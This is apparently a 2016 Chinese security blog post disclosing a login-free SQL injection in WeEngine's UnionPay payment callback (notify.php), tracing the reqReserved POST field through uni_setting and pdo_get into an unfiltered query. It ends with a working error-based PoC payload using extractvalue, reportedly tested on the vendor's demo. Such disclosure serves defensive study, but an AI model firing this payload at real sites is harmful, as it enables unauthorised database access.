微擎科技最新版某处无需登录sql注入
没穿底裤发表于 2016-07-13 09:35:15
文件\payment\unionpay\notify.php
<?php
/**
* [WeEngine System] Copyright (c) 2014 WE7.CC
* WeEngine is NOT a free software, it under the license terms, visited http://www.we7.cc/ for more details.
*/
error_reporting(0);
define('IN_MOBILE', true);
require '../../framework/bootstrap.inc.php';
$_W['uniacid'] = $_POST['reqReserved'];
$setting = uni_setting($_W['uniacid'], array('payment'));
if(!is_array($setting['payment'])) {
exit('没有设定支付参数.');
}
$payment = $setting['payment']['unionpay'];
require '__init.php';
if (!empty($_POST) && verify($_POST) && $_POST['respMsg'] == 'success') {
$sql = 'SELECT * FROM ' . tablename('core_paylog') . ' WHERE `uniontid`=:uniontid';
$params = array();
$params[':uniontid'] = $_POST['orderId'];
$log = pdo_fetch($sql, $params);
if(!empty($log) && $log['status'] == '0') {
$log['tag'] = iunserializer($log['tag']);
$log['tag']['queryId'] = $_POST['queryId'];
$record = array();
$record['status'] = 1;
$record['tag'] = iserializer($log['tag']);
pdo_update('core_paylog', $record, array('plid' => $log['plid']));
if($log['is_usecard'] == 1 && $log['card_type'] == 1 && !empty($log['encrypt_code']) && $log['acid']) {
load()->classs('coupon');
$acc = new coupon($log['acid']);
$codearr['encrypt_code'] = $log['encrypt_code'];
$codearr['module'] = $log['module'];
$codearr['card_id'] = $log['card_id'];
$acc->PayConsumeCode($codearr);
}
if($log['is_usecard'] == 1 && $log['card_type'] == 2) {
$log['card_id'] = intval($log['card_id']);
pdo_update('activity_coupon_record', array('status' => '2', 'usetime' => time(), 'usemodule' => $log['module']), array('uniacid' => $_W['uniacid'], 'recid' => $log['card_id'], 'status' => '1'));
}
$site = WeUtility::createModuleSite($log['module']);
if(!is_error($site)) {
$method = 'payResult';
if (method_exists($site, $method)) {
$ret = array();
$ret['weid'] = $log['uniacid'];
$ret['uniacid'] = $log['uniacid'];
$ret['result'] = 'success';
$ret['type'] = $log['type'];
$ret['from'] = 'nofity';
$ret['tid'] = $log['tid'];
$ret['user'] = $log['openid'];
$ret['fee'] = $log['fee'];
$ret['tag'] = $log['tag'];
$ret['is_usecard'] = $log['is_usecard'];
$ret['card_type'] = $log['card_type'];
$ret['card_fee'] = $log['card_fee'];
$ret['card_id'] = $log['card_id'];
$site->$method($ret);
exit('success');
}
}
}
}
exit('fail');着重对
require '../../framework/bootstrap.inc.php';
$_W['uniacid'] = $_POST['reqReserved'];
$setting = uni_setting($_W['uniacid'], array('payment'));
if(!is_array($setting['payment'])) {
exit('没有设定支付参数.');
}其实主要是对uni_setting进行查看。跟进uni_setting
if (!function_exists('uni_setting')) {
function uni_setting($uniacid = 0, $fields = '*', $force_update = false) {
global $_W;
load()->model('account');
if ($fields == '*') {
$fields = '';
}
return uni_setting_load($fields, $uniacid);
}
}继续跟进uni_setting_load
function uni_setting_load($name = '', $uniacid = 0) {
global $_W;
$uniacid = empty($uniacid) ? $_W['uniacid'] : $uniacid;
$cachekey = "unisetting:{$uniacid}";
$unisetting = cache_load($cachekey);
if (empty($unisetting)) {
$unisetting = pdo_get('uni_settings', array('uniacid' => $uniacid));
if (!empty($unisetting)) {
$serialize = array('site_info', 'stat', 'oauth', 'passport', 'uc', 'notify',
'creditnames', 'default_message', 'creditbehaviors', 'shortcuts', 'payment',
'recharge', 'tplnotice', 'mcplugin');
foreach ($unisetting as $key => &$row) {
if (in_array($key, $serialize) && !empty($row)) {
$row = (array)iunserializer($row);
}
}
}
cache_write($cachekey, $unisetting);
}
if (empty($unisetting)) {
return array();
}
if (empty($name)) {
return $unisetting;
}
if (!is_array($name)) {
$name = array($name);
}
return array_elements($name, $unisetting);
}注意到
$unisetting = pdo_get('uni_settings', array('uniacid' => $uniacid));继续跟进pdo_get
function pdo_get($tablename, $condition = array(), $fields = array()) {
return pdo()->get($tablename, $condition, $fields);
}持续跟进get
public function get($tablename, $params = array(), $fields = array()) {
$select = '*';
if (!empty($fields)){
if (is_array($fields)) {
$select = '`'.implode('`,`', $fields).'`';
} else {
$select = $fields;
}
}
$condition = $this->implode($params, 'AND');
$sql = "SELECT {$select} FROM " . $this->tablename($tablename) . (!empty($condition['fields']) ? " WHERE {$condition['fields']}" : '') . " LIMIT 1";
return $this->fetch($sql, $condition['params']);
}直接带入sql语句,没有过滤。直接上poc.
http://127.0.0.1/payment/unionpay/notify.php post: reqReserved[]=1'and extractvalue(1, concat(0x5c, (select user()))),'1
测试官方demo
